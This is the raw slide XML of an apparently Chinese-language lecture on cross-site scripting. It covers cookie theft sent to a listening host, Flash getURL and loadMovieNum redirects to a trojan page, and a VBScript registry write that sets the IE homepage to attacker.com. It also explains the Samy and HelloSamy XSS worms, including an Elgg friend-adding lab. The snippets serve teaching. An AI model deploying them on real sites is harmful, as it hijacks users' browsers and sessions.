              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>读取cookie并发给指定主机，主机开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>端口监听，能够收到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1886585" y="4697730"/>
            <a:ext cx="9648190" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>flash文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Action Script中插入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>重定向代码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>getURL("http://网页木马地址", "_blank", "GET");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>loadMovieNum("http://www.pete.cn/test.swf", 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86585" y="1710690"/>
            <a:ext cx="9933305" cy="3032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86585" y="1096010"/>
            <a:ext cx="9933940" cy="3353435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>修改注册表（IE 主页）：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>&lt;script language="VBScript"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>Set RegWsh = CreateObject("WScript.Shell");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>//设置IE浏览器默认页</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>RegWsh.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RegWrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>("HKCU\Software\Microsoft\Internet Explorer\Main\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start Page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>&lt;/script&gt;</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648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存储型XSS攻击</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JS</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代码</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613535" cy="500380"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2660" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Samy</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2660" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>蠕虫</a:t>
              </a:r>
              <a:endPar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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="880110"/>
            <a:ext cx="9932035" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>MySpace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>攻击中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>无须他人同意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>就能把自己添加到其他人的好友列表中，还会</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>传染</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>到其他人的主页上，添加好友，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>消耗服务器资源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="1833245"/>
            <a:ext cx="9932035" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在自己的主页上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代码（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>保存在服务器的数据库中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，当其他人浏览其主页时，注入的代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>被触发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，自动发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为好友的请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>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rot="16200000">
            <a:off x="3970020" y="-2547620"/>
            <a:ext cx="2216150" cy="7311390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3044190" y="880110"/>
            <a:ext cx="4352925" cy="7025640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6290310" y="158750"/>
            <a:ext cx="1343025" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1685925" y="2743200"/>
            <a:ext cx="6896100" cy="10864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733790" y="3094355"/>
            <a:ext cx="2734310" cy="2306955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求，Samy向Elgg添加好友</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>保存在服务器的数据库中</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="直接连接符 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4393565" y="3676650"/>
            <a:ext cx="3619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156960" y="4209415"/>
            <a:ext cx="1127760" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="直接箭头连接符 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4755515" y="3733800"/>
            <a:ext cx="1257300" cy="5905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3663950" y="4750435"/>
            <a:ext cx="632460" cy="1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6200000">
            <a:off x="2310130" y="-967740"/>
            <a:ext cx="6790055" cy="8725535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5966460" y="1568450"/>
            <a:ext cx="3476625" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代码注入到个人主页</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rot="16200000">
            <a:off x="2566670" y="-2065655"/>
            <a:ext cx="6550025" cy="10680700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8161020" y="958850"/>
            <a:ext cx="3512185" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Elgg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求添加好友</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rot="16200000">
            <a:off x="4366260" y="-1536065"/>
            <a:ext cx="4698365" cy="9540240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3248025" y="346710"/>
            <a:ext cx="2692400" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>蠕虫自我复制</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3248025" y="346710"/>
            <a:ext cx="4578985" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2011</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>新浪微博HelloSamy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>蠕虫</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2845435" y="1902460"/>
            <a:ext cx="6943725" cy="1762125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1833880" y="980440"/>
            <a:ext cx="9724390" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>大量用户自动发送诸如：“郭美美事件的一些未注意到的细节”，“建党大业中穿帮的地方”，“让女人心动的100句诗歌”，“惊爆!范冰冰艳照真流出了”等等 微博和私信，并自动关注一位名为hellosamy的用户。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1715770" y="4136390"/>
            <a:ext cx="9842500" cy="2030095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
